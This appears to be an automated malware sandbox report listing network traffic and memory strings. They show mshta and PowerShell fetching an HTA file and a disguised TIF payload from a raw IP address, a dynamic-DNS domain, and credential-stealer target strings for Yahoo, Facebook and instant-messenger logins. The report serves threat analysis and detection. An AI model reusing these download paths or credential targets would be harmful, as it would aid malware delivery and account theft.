          Source: global trafficHTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 107.174.146.46If-Range: "33796-625b5448e34a0"
          Source: global trafficHTTP traffic detected: GET /57/picturewithgreatnewswithgoodthingsonbestplace.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 30 Oct 2024 17:45:29 GMTConnection: Keep-AliveHost: 107.174.146.46If-None-Match: "33796-625b5448e34a0"
          Source: global trafficHTTP traffic detected: GET /57/RFGGVFRR.txt HTTP/1.1Host: 107.174.146.46Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
          Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
          Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
          Source: CasPol.exe, 0000002E.00000002.521421679.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
          Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.facebook.com (Facebook)
          Source: CasPol.exe, 0000001F.00000002.514784268.0000000001D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login#H equals www.yahoo.com (Yahoo)
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
          Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: acesso.run
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: seemebest2024rmc.duckdns.org
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/
          Source: mshta.exe, 00000010.00000003.462590642.00000000003C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.460408085.000000000327D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta
          Source: mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta...Q5
          Source: mshta.exe, 00000004.00000002.412322987.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.412104448.0000000000140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.hta.NET4.0C;
          Source: mshta.exe, 00000004.00000003.409103792.0000000003683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.0000000003683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaC:
          Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaE
          Source: mshta.exe, 00000004.00000002.413132932.0000000003633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411691623.0000000003633000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaN
          Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.0000000000391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaain
          Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaepC:
          Source: mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestrain
          Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htaestraino4
          Source: mshta.exe, 00000004.00000003.410387499.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.408514038.0000000003195000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463384059.0000000003275000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.461250069.0000000003275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htahttp://107.174.146.46/5
          Source: mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htal
          Source: mshta.exe, 00000004.00000003.409103792.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413158263.000000000369D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/noc/ernashgetmebackwithgoodnewswhichgrreatthings.htant
          Source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/picture
          Source: powershell.exe, 00000012.00000002.477548914.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.479984723.000000001B216000.00000004.00000020.00020000.00000000.sdmp, bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIF
          Source: powershell.exe, 00000012.00000002.479984723.000000001B1D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFC:
          Source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.477548914.0000000002555000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.174.146.46/57/picturewithgreatnewswithgoodthingsonbestplace.tIFp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
          Source: powershell.exe, 00000005.00000002.426757676.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
          Source: bhv417.tmp.31.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
          Source: bhv417.tmp.31.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
          Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
